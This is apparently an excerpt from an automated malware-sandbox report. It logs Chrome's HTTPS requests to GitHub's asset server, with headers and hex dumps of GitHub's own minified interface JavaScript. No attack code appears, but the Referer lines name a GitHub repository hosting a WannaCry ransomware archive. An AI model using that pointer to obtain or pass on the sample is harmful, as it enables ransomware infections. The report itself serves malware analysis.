                                                                                      X-Cache-Hits: 50, 2
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: c2539ec47ff27a5c83b889e8bc62a2ba76300721
                                                                                      2024-03-23 14:47:22 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 65 2d 61 74 74 61 63 68 6d 65 6e 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 76 69 65 77 2d 63 6f 2d 33 39 35 39 61 39 22 5d 2c 7b 35 37 32 36 30 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 50 3a 28 29 3d 3e 41 74 74 61 63 68 6d 65 6e 74 7d 29 3b 6c 65 74 20 41 74 74 61 63 68 6d 65 6e 74 3d 63 6c 61 73 73 20 41 74 74 61 63 68 6d 65 6e 74 7b 63 6f
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9"],{57260:(t,e,i)=>{i.d(e,{P:()=>Attachment});let Attachment=class Attachment{co
                                                                                      2024-03-23 14:47:22 UTC16384INData Raw: 68 69 73 2e 75 70 64 61 74 65 28 29 29 2c 74 53 28 74 68 69 73 29 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 74 68 69 73 2e 75 70 64 61 74 65 28 29 7d 75 70 64 61 74 65 28 29 7b 74 68 69 73 2e 69 73 43 6f 6e 6e 65 63 74 65 64 26 26 28 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 78 28 74 68 69 73 2c 66 2c 22 66 22 29 29 2c 74 4d 28 74 68 69 73 2c 66 2c 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 29 3d 3e 7b 6c 65 74 20 74 3d 74 68 69 73 2e 61 6e 63 68 6f 72 45 6c 65 6d 65 6e 74 3b 69 66 28 74 68 69 73 2e 63 6c 61 73 73 4c 69 73 74 2e 74 6f 67 67 6c 65 28 22 6e 6f 74 2d 61 6e 63 68 6f 72 65 64 22 2c 21 74 29 2c 74 29 7b 6c 65 74 7b 6c 65 66 74 3a 65 2c 74 6f 70 3a 69 7d
                                                                                      Data Ascii: his.update()),tS(this)}attributeChangedCallback(){this.update()}update(){this.isConnected&&(cancelAnimationFrame(tx(this,f,"f")),tM(this,f,requestAnimationFrame(()=>{let t=this.anchorElement;if(this.classList.toggle("not-anchored",!t),t){let{left:e,top:i}
                                                                                      2024-03-23 14:47:22 UTC16384INData Raw: 61 6c 6c 28 74 29 3a 6e 3f 6e 2e 76 61 6c 75 65 3a 65 2e 67 65 74 28 74 29 7d 3b 6c 65 74 20 74 30 3d 63 6c 61 73 73 20 4e 61 76 4c 69 73 74 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 2e 2e 2e 61 72 67 75 6d 65 6e 74 73 29 2c 77 2e 61 64 64 28 74 68 69 73 29 2c 45 2e 73 65 74 28 74 68 69 73 2c 76 6f 69 64 20 30 29 7d 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 74 68 69 73 2e 74 6f 70 4c 65 76 65 6c 4c 69 73 74 26 26 74 4a 28 74 68 69 73 2c 45 2c 6e 65 77 20 41 63 74 69 6f 6e 4c 69 73 74 54 72 75 6e 63 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 74 68 69 73 2e 74 6f 70 4c 65 76 65 6c 4c 69 73 74 29 2c 22 66 22 29 7d 64 69 73 63 6f 6e 6e 65 63
                                                                                      Data Ascii: all(t):n?n.value:e.get(t)};let t0=class NavListElement extends HTMLElement{constructor(){super(...arguments),w.add(this),E.set(this,void 0)}connectedCallback(){this.topLevelList&&tJ(this,E,new ActionListTruncationObserver(this.topLevelList),"f")}disconnec
                                                                                      2024-03-23 14:47:22 UTC16384INData Raw: 65 74 28 74 68 69 73 2c 48 2c 22 6d 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 74 2e 74 79 70 65 3f 22 6d 6f 75 73 65 22 3a 22 66 6f 63 75 73 22 2c 22 66 22 29 2c 74 68 69 73 2e 73 68 6f 77 50 6f 70 6f 76 65 72 28 29 29 2c 22 74 6f 67 67 6c 65 22 3d 3d 3d 74 2e 74 79 70 65 26 26 74 38 28 74 68 69 73 2c 4f 2c 22 6d 22 2c 57 29 2e 63 61 6c 6c 28 74 68 69 73 2c 22 6f 70 65 6e 22 3d 3d 3d 74 2e 6e 65 77 53 74 61 74 65 29 7d 61 74 74 72 69 62 75 74 65 43 68 61 6e 67 65 64 43 61 6c 6c 62 61 63 6b 28 74 29 7b 74 68 69 73 2e 69 73 43 6f 6e 6e 65 63 74 65 64 26 26 28 22 69 64 22 3d 3d 3d 74 7c 7c 22 64 61 74 61 2d 74 79 70 65 22 3d 3d 3d 74 3f 74 38 28 74 68 69 73 2c 4f 2c 22 6d 22 2c 46 29 2e 63 61 6c 6c 28 74 68 69 73 29 3a 22 64 61 74 61 2d 64 69 72 65 63 74 69 6f
                                                                                      Data Ascii: et(this,H,"mouseenter"===t.type?"mouse":"focus","f"),this.showPopover()),"toggle"===t.type&&t8(this,O,"m",W).call(this,"open"===t.newState)}attributeChangedCallback(t){this.isConnected&&("id"===t||"data-type"===t?t8(this,O,"m",F).call(this):"data-directio
                                                                                      2024-03-23 14:47:22 UTC16384INData Raw: 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 6a 2e 6a 6f 69 6e 28 22 2c 22 29 29 29 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 65 44 28 74 68 69 73 2c 4b 2c 22 6d 22 2c 51 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 7b 73 69 67 6e 61 6c 3a 74 7d 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 65 44 28 74 68 69 73 2c 4b 2c 22 6d 22 2c 51 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 7b 73 69 67 6e 61 6c 3a 74 7d 29 7d 2c 51 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 65 44 28 74 68 69 73 2c 4b 2c 22 6d 22 2c 74 69 29 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 65 3d 74 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 65 71
                                                                                      Data Ascii: his.querySelectorAll(ej.join(",")))e.addEventListener("click",eD(this,K,"m",Q).bind(this),{signal:t}),e.addEventListener("keydown",eD(this,K,"m",Q).bind(this),{signal:t})},Q=function(t){if(!eD(this,K,"m",ti).call(this,t))return!1;let e=t.target.closest(eq
                                                                                      2024-03-23 14:47:22 UTC12044INData Raw: 75 7b 31 46 34 38 37 7d 5c 75 32 30 30 44 5c 75 32 36 34 32 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 34 38 37 7d 5c 75 32 30 30 44 5c 75 32 36 34 30 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 36 42 36 7d 22 2c 22 5c 75 7b 31 46 36 42 36 7d 5c 75 32 30 30 44 5c 75 32 36 34 32 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 36 42 36 7d 5c 75 32 30 30 44 5c 75 32 36 34 30 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 39 43 44 7d 22 2c 22 5c 75 7b 31 46 39 43 44 7d 5c 75 32 30 30 44 5c 75 32 36 34 32 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 39 43 44 7d 5c 75 32 30 30 44 5c 75 32 36 34 30 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 39 43 45 7d 22 2c 22 5c 75 7b 31 46 39 43 45 7d 5c 75 32 30 30 44 5c 75 32 36 34 32 5c 75 46 45 30 46 22 2c 22 5c 75 7b 31 46 39 43 45 7d 5c
                                                                                      Data Ascii: u{1F487}\u200D\u2642\uFE0F","\u{1F487}\u200D\u2640\uFE0F","\u{1F6B6}","\u{1F6B6}\u200D\u2642\uFE0F","\u{1F6B6}\u200D\u2640\uFE0F","\u{1F9CD}","\u{1F9CD}\u200D\u2642\uFE0F","\u{1F9CD}\u200D\u2640\uFE0F","\u{1F9CE}","\u{1F9CE}\u200D\u2642\uFE0F","\u{1F9CE}\


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.1649728185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC651OUTGET /assets/github-elements-369bd99876f6.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 37405
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 08 Mar 2024 17:00:22 GMT
                                                                                      ETag: 0x8DC3F913DFBA24C
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 159492
                                                                                      X-Served-By: cache-iad-kiad7000173-IAD, cache-ewr18176-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 29, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 0d0026afb287c8fed6fdb56b113c6475501778c1
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 22 5d 2c 7b 39 34 34 32 34 3a 28 65 2c 74 2c 69 29 3d 3e 7b 69 28 35 30 30 36 34 29 2c 69 28 33 38 32 35 37 29 2c 69 28 31 34 38 34 30 29 2c 69 28 35 37 32 36 30 29 2c 69 28 31 33 30 30 32 29 2c 69 28 37 33 39 32 31 29 3b 76 61 72 20 6e 2c 73 3d 69 28 32 37 30 33 34 29 3b 69 28 35 31 39 34 31 29 2c 69 28 38 38 33 30 39 29 2c 69 28 34 30 39 38 37 29 2c 69 28 33 33 34 39 31 29 2c 69 28 38 38 38 32 33 29 2c 77 69 6e 64 6f 77 2e 49 6e 63 6c 75 64 65 46 72 61 67 6d 65 6e 74 45 6c 65 6d 65 6e 74
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["github-elements"],{94424:(e,t,i)=>{i(50064),i(38257),i(14840),i(57260),i(13002),i(73921);var n,s=i(27034);i(51941),i(88309),i(40987),i(33491),i(88823),window.IncludeFragmentElement
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 2c 22 73 65 74 22 29 3b 72 65 74 75 72 6e 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 69 66 28 74 2e 73 65 74 29 74 2e 73 65 74 2e 63 61 6c 6c 28 65 2c 69 29 3b 65 6c 73 65 7b 69 66 28 21 74 2e 77 72 69 74 61 62 6c 65 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 73 65 74 20 72 65 61 64 20 6f 6e 6c 79 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 22 29 3b 74 2e 76 61 6c 75 65 3d 69 7d 7d 28 65 2c 6e 2c 69 29 2c 69 7d 61 28 5b 72 2e 66 41 5d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 22 68 65 6c 70 46 69 65 6c 64 22 2c 76 6f 69 64 20 30 29 2c 61 28 5b 72 2e 47 4f 5d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2c 22 68 65 6c 70 54 65 78 74 73 22 2c 76 6f 69 64 20 30 29 2c 61 28 5b 72 2e 47 4f 5d 2c 6f 2e 70 72 6f 74
                                                                                      Data Ascii: t,"set");return!function(e,t,i){if(t.set)t.set.call(e,i);else{if(!t.writable)throw TypeError("attempted to set read only private field");t.value=i}}(e,n,i),i}a([r.fA],o.prototype,"helpField",void 0),a([r.GO],o.prototype,"helpTexts",void 0),a([r.GO],o.prot
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 29 21 3d 3d 73 7c 7c 73 3c 69 7c 7c 73 3e 65 2e 6c 65 6e 67 74 68 29 63 6f 6e 74 69 6e 75 65 3b 6c 65 74 20 74 3d 65 2e 73 6c 69 63 65 28 69 2c 73 29 3b 22 22 21 3d 3d 74 26 26 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 65 2e 73 6c 69 63 65 28 69 2c 73 29 29 29 2c 69 3d 73 2b 31 3b 6c 65 74 20 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6d 61 72 6b 22 29 3b 72 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 5b 73 5d 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 29 7d 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 65 2e 73 6c 69 63 65 28 69 29 29 29 2c 74 68 69 73 2e 72 65 70 6c 61 63 65
                                                                                      Data Ascii: s)!==s||s<i||s>e.length)continue;let t=e.slice(i,s);""!==t&&n.appendChild(document.createTextNode(e.slice(i,s))),i=s+1;let r=document.createElement("mark");r.textContent=e[s],n.appendChild(r)}n.appendChild(document.createTextNode(e.slice(i))),this.replace
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 65 26 26 69 2e 68 61 73 4e 75 6d 62 65 72 2c 69 7d 28 69 2e 76 61 6c 75 65 2c 7b 6d 69 6e 69 6d 75 6d 43 68 61 72 61 63 74 65 72 43 6f 75 6e 74 3a 4e 75 6d 62 65 72 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6d 69 6e 69 6d 75 6d 2d 63 68 61 72 61 63 74 65 72 2d 63 6f 75 6e 74 22 29 29 2c 70 61 73 73 70 68 72 61 73 65 4c 65 6e 67 74 68 3a 4e 75 6d 62 65 72 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 70 61 73 73 70 68 72 61 73 65 2d 6c 65 6e 67 74 68 22 29 29 7d 29 3b 69 66 28 73 2e 76 61 6c 69 64 29 7b 69 2e 73 65 74 43 75 73 74 6f 6d 56 61 6c 69 64 69 74 79 28 22 22 29 3b 6c 65 74 20 65 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 64 6c 2e 66 6f 72 6d 2d 67 72 6f 75 70 22 29 3b 65 26 26 28 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72
                                                                                      Data Ascii: se&&i.hasNumber,i}(i.value,{minimumCharacterCount:Number(t.getAttribute("minimum-character-count")),passphraseLength:Number(t.getAttribute("passphrase-length"))});if(s.valid){i.setCustomValidity("");let e=t.querySelector("dl.form-group");e&&(e.classList.r
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 26 28 61 3d 28 72 3c 33 3f 73 28 61 29 3a 72 3e 33 3f 73 28 74 2c 69 2c 61 29 3a 73 28 74 2c 69 29 29 7c 7c 61 29 3b 72 65 74 75 72 6e 20 72 3e 33 26 26 61 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 61 29 2c 61 7d 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 67 65 74 28 22 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 22 29 7c 7c 28 77 69 6e 64 6f 77 2e 50 61 73 73 77 6f 72 64 53 74 72 65 6e 67 74 68 45 6c 65 6d 65 6e 74 3d 62 2c 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 64 65 66 69 6e 65 28 22 70 61 73 73 77 6f 72 64 2d 73 74 72 65 6e 67 74 68 22 2c 62 29 29 2c 69 28 36 30 34 33 35 29 3b 6c 65 74 20 45 3d 63 6c 61 73 73 20 50 6f 6c 6c 49 6e 63 6c 75 64 65 46 72 61
                                                                                      Data Ascii: &(a=(r<3?s(a):r>3?s(t,i,a):s(t,i))||a);return r>3&&a&&Object.defineProperty(t,i,a),a}window.customElements.get("password-strength")||(window.PasswordStrengthElement=b,window.customElements.define("password-strength",b)),i(60435);let E=class PollIncludeFra
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 7b 74 68 69 73 2e 69 6e 70 75 74 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 26 26 74 68 69 73 2e 73 65 74 4d 65 6e 75 28 65 2c 74 29 7d 64 65 61 63 74 69 76 61 74 65 28 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e 6d 65 6e 75 2c 74 3d 74 68 69 73 2e 63 6f 6d 62 6f 62 6f 78 3b 72 65 74 75 72 6e 21 21 65 26 26 21 21 74 26 26 28 74 68 69 73 2e 6d 65 6e 75 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6d 62 6f 62 6f 78 3d 6e 75 6c 6c 2c 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6f 6d 62 6f 62 6f 78 2d 63 6f 6d 6d 69 74 22 2c 74 68 69 73 2e 6f 6e 63 6f 6d 6d 69 74 29 2c 65 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 74 68 69 73 2e 6f 6e 6d 6f 75 73 65 64 6f
                                                                                      Data Ascii: {this.input===document.activeElement&&this.setMenu(e,t)}deactivate(){let e=this.menu,t=this.combobox;return!!e&&!!t&&(this.menu=null,this.combobox=null,e.removeEventListener("combobox-commit",this.oncommit),e.removeEventListener("mousedown",this.onmousedo
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 26 28 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 74 29 29 7d 69 66 28 69 26 26 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2c 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 2c 6e 26 26 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 21 72 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 69 66 28 21 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 74 65 78 74 46 69 65 6c 64 20 6d 75 73 74 20 68 61 76 65 20 61 20 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 20 74 6f 20 6d 69 72 72 6f 72 22 29 3b 65 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 72 2c 65 29 7d 72 65 74 75 72 6e 20 72 2e 73 63 72 6f 6c 6c 54 6f 70 3d 65 2e 73 63 72 6f 6c 6c 54 6f 70
                                                                                      Data Ascii: &(i=document.createTextNode(t))}if(i&&r.appendChild(i),r.appendChild(a),n&&r.appendChild(n),!r.parentElement){if(!e.parentElement)throw Error("textField must have a parentElement to mirror");e.parentElement.insertBefore(r,e)}return r.scrollTop=e.scrollTop
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 61 6c 75 65 3a 65 7d 7d 61 73 79 6e 63 20 6f 6e 43 6f 6d 6d 69 74 28 7b 74 61 72 67 65 74 3a 65 7d 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 7c 7c 21 74 68 69 73 2e 63 6f 6d 62 6f 62 6f 78 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 74 68 69 73 2e 6d 61 74 63 68 3b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 7b 69 74 65 6d 3a 65 2c 6b 65 79 3a 74 2e 6b 65 79 2c 76 61 6c 75 65 3a 6e 75 6c 6c 7d 2c 73 3d 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 74 65 78 74 2d 65 78 70 61 6e 64 65 72 2d 76 61 6c 75 65 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 2c 64 65 74 61 69 6c 3a 6e 7d 29 2c 72 3d 21 74 68 69 73 2e 65 78 70 61 6e 64 65 72 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 73 29 2c
                                                                                      Data Ascii: alue:e}}async onCommit({target:e}){if(!(e instanceof HTMLElement)||!this.combobox)return;let t=this.match;if(!t)return;let n={item:e,key:t.key,value:null},s=new CustomEvent("text-expander-value",{cancelable:!0,detail:n}),r=!this.expander.dispatchEvent(s),
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6e 3a 6e 2e 70 6f 73 69 74 69 6f 6e 2c 62 65 67 69 6e 6e 69 6e 67 4f 66 4c 69 6e 65 3a 6e 2e 62 65 67 69 6e 6e 69 6e 67 4f 66 4c 69 6e 65 7d 7d 7d 61 73 79 6e 63 20 6e 6f 74 69 66 79 50 72 6f 76 69 64 65 72 73 28 65 29 7b 6c 65 74 20 74 3d 5b 5d 2c 6e 3d 65 3d 3e 74 2e 70 75 73 68 28 65 29 2c 73 3d 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 74 65 78 74 2d 65 78 70 61 6e 64 65 72 2d 63 68 61 6e 67 65 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 2c 64 65 74 61 69 6c 3a 7b 70 72 6f 76 69 64 65 3a 6e 2c 74 65 78 74 3a 65 2e 74 65 78 74 2c 6b 65 79 3a 65 2e 6b 65 79 7d 7d 29 2c 72 3d 21 74 68 69 73 2e 65 78 70 61 6e 64 65 72 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 73 29 3b 69 66 28 72 29 72 65 74 75 72 6e 3b 6c 65 74 7b 6f 6e 43 68 61 6e 67 65
                                                                                      Data Ascii: n:n.position,beginningOfLine:n.beginningOfLine}}}async notifyProviders(e){let t=[],n=e=>t.push(e),s=new CustomEvent("text-expander-change",{cancelable:!0,detail:{provide:n,text:e.text,key:e.key}}),r=!this.expander.dispatchEvent(s);if(r)return;let{onChange
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 65 20 66 6f 72 28 76 61 72 20 6f 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 6f 3e 3d 30 3b 6f 2d 2d 29 28 73 3d 65 5b 6f 5d 29 26 26 28 61 3d 28 72 3c 33 3f 73 28 61 29 3a 72 3e 33 3f 73 28 74 2c 69 2c 61 29 3a 73 28 74 2c 69 29 29 7c 7c 61 29 3b 72 65 74 75 72 6e 20 72 3e 33 26 26 61 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 61 29 2c 61 7d 6e 3d 63 6c 61 73 73 20 53 6c 61 73 68 43 6f 6d 6d 61 6e 64 45 78 70 61 6e 64 65 72 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 7b 67 65 74 20 6b 65 79 73 28 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6b 65 79 73 22 29 3b 72 65 74 75 72 6e 20 65 3f 65 2e 73 70 6c 69 74 28 22 20 22 29 3a 5b 5d 7d 63 6f 6e 6e 65
                                                                                      Data Ascii: e for(var o=e.length-1;o>=0;o--)(s=e[o])&&(a=(r<3?s(a):r>3?s(t,i,a):s(t,i))||a);return r>3&&a&&Object.defineProperty(t,i,a),a}n=class SlashCommandExpanderElement extends HTMLElement{get keys(){let e=this.getAttribute("keys");return e?e.split(" "):[]}conne


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.1649730185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC652OUTGET /assets/element-registry-fb4b8d40f206.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 50268
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 22 Mar 2024 12:04:42 GMT
                                                                                      ETag: 0x8DC4A6841E6F070
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 75615
                                                                                      X-Served-By: cache-iad-kcgs7200084-IAD, cache-lga21975-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 39, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 39495820717d06f4055fec832981c6d7968cd753
